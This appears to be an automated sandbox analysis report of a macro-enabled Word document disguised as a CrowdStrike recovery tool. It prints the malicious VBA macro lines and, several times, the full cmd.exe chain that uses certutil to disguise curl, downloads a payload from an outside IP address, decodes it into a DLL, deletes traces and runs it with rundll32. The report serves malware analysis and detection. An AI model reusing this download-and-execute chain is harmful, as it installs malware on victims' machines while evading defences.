Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: 'pp = pp + "cmd.exe -d & exit"
Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Set objShell = CreateObject("WScript.Shell")
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String environ: dir = Environ("temp")	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String cmd.exe: pp = pp + "tem32\cmd.exe /c "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String rundll32: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "	Name: MainFunc
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function MainFunc, String wscript: Set objShell = CreateObject("WScript.Shell")	Name: MainFunc
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "tem32\cmd.exe /c "
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: pp = pp + "START " + vbDblQuote + " " + vbDblQuote + " rundll32 " + mal_dec_exe_path + ",DllMain" + " & "

Downloads suspicious files via Chrome

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File dump: C:\Users\user\Downloads\MsftRecoveryToolForCSv2.zip (copy)

Jump to dropped file

Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6529.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6690.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer7050.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer601A.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer60A7.tmp	Jump to behavior
Source: C:\Windows\System32\certutil.exe	File created: C:\Windows\cer6873.tmp	Jump to behavior

Source: C:\Windows\System32\certutil.exe

File deleted: C:\Windows\cer6529.tmp

Jump to behavior

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490F28	7_2_000000013F490F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F499B60	7_2_000000013F499B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B1B00	7_2_000000013F4B1B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F497BAC	7_2_000000013F497BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4BCBDC	7_2_000000013F4BCBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490658	7_2_000000013F490658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F481AB0	7_2_000000013F481AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AE4F0	7_2_000000013F4AE4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F48A9B4	7_2_000000013F48A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A49D0	7_2_000000013F4A49D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4AADC8	7_2_000000013F4AADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49BDE0	7_2_000000013F49BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49B840	7_2_000000013F49B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F484860	7_2_000000013F484860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F49F458	7_2_000000013F49F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4C0804	7_2_000000013F4C0804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4944A4	7_2_000000013F4944A4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A88D8	7_2_000000013F4A88D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F490C74	7_2_000000013F490C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4B2C88	7_2_000000013F4B2C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 7_2_000000013F4A7888	7_2_000000013F4A7888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F331B00	22_2_000000013F331B00
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F319B60	22_2_000000013F319B60
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310F28	22_2_000000013F310F28
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F33CBDC	22_2_000000013F33CBDC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F317BAC	22_2_000000013F317BAC
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310658	22_2_000000013F310658
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F301AB0	22_2_000000013F301AB0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32E4F0	22_2_000000013F32E4F0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31BDE0	22_2_000000013F31BDE0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F32ADC8	22_2_000000013F32ADC8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3249D0	22_2_000000013F3249D0
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F30A9B4	22_2_000000013F30A9B4
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F340804	22_2_000000013F340804
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31F458	22_2_000000013F31F458
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F304860	22_2_000000013F304860
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F31B840	22_2_000000013F31B840
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F332C88	22_2_000000013F332C88
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F327888	22_2_000000013F327888
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F310C74	22_2_000000013F310C74
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3288D8	22_2_000000013F3288D8
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: 22_2_000000013F3144A4	22_2_000000013F3144A4

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE, VBA macro line: Sub Document_Open()
Source: VBA code instrumentation	OLE, VBA macro: Module ThisDocument, Function Document_Open	Name: Document_Open
Source: ~WRC0001.tmp.16.dr	OLE, VBA macro line: Sub Document_Open()

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, VBA macros: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, VBA macros: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Stream path 'VBA/__SRP_0' : http://172.104.160.126:8099\curl.txt\curl.exe/payload2.txt\mscorsvc.txt\mscorsvc.dllC:\Windows\Sys"tem32\cmd.exe /c$-encode$\cu-decode"$ -o$del&rl.exe &.bq.aSTART( rundll32&,DllMainexit

Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr

OLE stream indicators for Word, Excel, PowerPoint, and Visio: all false

Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F48A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F495658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321F00 appears 134 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F321FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1FA0 appears 107 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F314FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F315658 appears 44 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F30A780 appears 49 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F494FC8 appears 90 times
Source: C:\Users\user\AppData\Local\Temp\curl.exe	Code function: String function: 000000013F4A1F00 appears 134 times

Source: classification engine

Classification label: mal88.expl.evad.winDOCM@51/26@4/3

Source: C:\Users\user\AppData\Local\Temp\curl.exe

Code function: 7_2_000000013F483434 CreateToolhelp32Snapshot,GetLastError,CloseHandle,Module32First,Module32Next,

7_2_000000013F483434

Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe

File created: C:\Program Files\Google

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\Desktop\~$w_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File created: C:\Users\user\AppData\Local\Temp\CVRAC07.tmp

Jump to behavior

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE indicator, Word Document stream: true
Source: ~WRC0001.tmp.16.dr	OLE indicator, Word Document stream: true
Source: ~WRC0000.tmp.16.dr	OLE indicator, Word Document stream: true

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: title field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: author field not present or empty
Source: ~WRF{3AA38F7F-7D95-4F50-A501-E291FEC70BAA}.tmp.0.dr	OLE document summary: edited time not present or 0
Source: ~WRC0001.tmp.16.dr	OLE document summary: title field not present or empty

Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ..............t........8Mw....f.......................v........v#.............	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......@.......(x#.....q8Mw............................~........w#.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d......................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....................H.......<...............#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d......................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............................p.......(.P.............................................#........3)...............!.....b.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.............................................#........3)...............................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dA............... .....*.......q(2w...... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................D...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dA............... .....,................. .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................\...............#.......(dA............... ....................... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!............................... .....(.P.............................`...............#........3)...............!.....b.........2....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................................. .....(.P.............................d...............#........3).............(. ...............!....... .....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.....................D.......................#.......(d................!.............q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....................D.......................#.......(d..............H.................!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!.............x.6.....................(.P.....................D.......................#.........6...............!.....n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.6.....................(.P.....................D.......................#.........6.............h........... .r...!.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..!..............Q.w....................(.P.............................................#.......p.$...............!.....j.......................	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ......P.(......^I.......uw......E.......(.............v........]I.............
Source: C:\Windows\System32\cmd.exe	Console Write: ..................aJ....................................@ceJ..... ........(......`I.......uw......E..... .(.............~........^I.............
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4...............#........d..............H.(.....*.......q(2w......(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(.......................7{..............#........d..............H.(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8.............#........d..............H.(.....,.................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........d..............H.(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................ .(.....(.P.....(........................{..............#........3).....................b.........x.......(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ..................................(.....(.P.....(........................{..............#........3)...............(.......................(.....	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................I.n.p.u.t. .L.e.n.g.t.h. .=. .7.3.0.1.0.8...............#.......(dF.....................*.......q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(........................\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................O.u.t.p.u.t. .L.e.n.g.t.h. .=. .5.3.0.9.4.4.............#.......(dF.....................,.......................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(.......................'\|..............#.......(dF.............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................................p.......(.P.....(.......................+\|..............#........3).....................b.........7.............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ........................................(.P.....(......................./\|..............#........3).............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w............ .......(.P.....(.......................v~..............#.......(d..............................q(2w............	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(.......................z~..............#.......(d..............................................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.............@.......(.P.....(.......................~~..............#.........#.....................n... .r.e.t.u.r.........	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: ................x.#.....................(.P.....(........................~..............#.........#......................... .r.................	Jump to behavior
Source: C:\Windows\System32\certutil.exe	Console Write: .................Q.w....................(.P.....(........................~..............#.......p.$.....................j.......................	Jump to behavior

Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE

File read: C:\Users\desktop.ini

Jump to behavior

Source: C:\Windows\System32\xcopy.exe

Key opened: HKEY_LOCAL_MACHINE\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Windows\System32\cmd.exe

Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain

Source: New_Recovery_Tool_to_help_with_CrowdStrike_issue_impacting_Windows.docm

ReversingLabs: Detection: 26%

Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories. Use "--help category" to get an overview of all categories. For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: curl: try 'curl --help' for more information
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".
Source: curl.exe	String found in binary or memory: This is not the full help, this menu is stripped into categories.Use "--help category" to get an overview of all categories.For all options use the manual or "--help all".

Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized "about:blank"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" "https://go.microsoft.com/fwlink/?linkid=2280386"
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
Source: unknown	Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE "C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE	Process created: C:\Windows\System32\cmd.exe "C:\Windows\System32\cmd.exe" /c xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp & certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe & C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt & certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\curl.txt & del C:\Users\user\AppData\Local\Temp\curl.exe & del C:\Users\user\AppData\Local\Temp\mscorsvc.txt & START " " rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain & exit	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\xcopy.exe xcopy C:\Windows\System32\curl.exe C:\Users\user\AppData\Local\Temp	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -encode C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\curl.txt C:\Users\user\AppData\Local\Temp\curl.exe	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Users\user\AppData\Local\Temp\curl.exe C:\Users\user\AppData\Local\Temp\curl.exe http://172.104.160.126:8099/payload2.txt -o C:\Users\user\AppData\Local\Temp\mscorsvc.txt	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\certutil.exe certutil -f -decode C:\Users\user\AppData\Local\Temp\mscorsvc.txt C:\Users\user\AppData\Local\Temp\mscorsvc.dll	Jump to behavior
Source: C:\Windows\System32\cmd.exe	Process created: C:\Windows\System32\rundll32.exe rundll32 C:\Users\user\AppData\Local\Temp\mscorsvc.dll,DllMain	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1352 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe "C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.FileUtilService --lang=en-US --service-sandbox-type=service --mojo-platform-channel-handle=2208 --field-trial-handle=1336,i,10461182675022210413,3013190625299692533,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
Source: C:\Program Files (x86)\Google\Chrome\Application\chrome.exe	Process created: unknown unknown	Jump to behavior
